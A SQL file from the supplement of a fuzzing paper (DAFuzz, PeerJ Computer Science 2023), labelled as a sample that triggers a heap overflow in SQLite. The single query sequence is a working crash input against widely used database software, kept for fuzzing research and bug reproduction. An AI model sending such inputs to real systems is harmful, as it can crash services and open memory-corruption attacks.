# Supplementary material for: DAFuzz: data-aware fuzzing of in-memory data stores
Source: PeerJ Comput Sci. 2023 Sep 19;9:e1592. doi: 10.7717/peerj-cs.1592 (PMC10557509; doi:10.7717/peerj-cs.1592)
Supplement: Supplemental Information 2 [file peerj-cs-09-1592-s002.zip › DAFuzz/docs/vuln_samples/sqlite-heap-overflow.sql]

DROP TABLE IF EXISTS t;CREATE VIRTUAL TABLE t0 USING fts4();insert into t0 select zeroblob(0);SAVEPOINT O;insert into t0
select(0);SAVEPOINT E;insert into t0 SELECT 0 UNION SELECT 0'x'ORDER BY x;
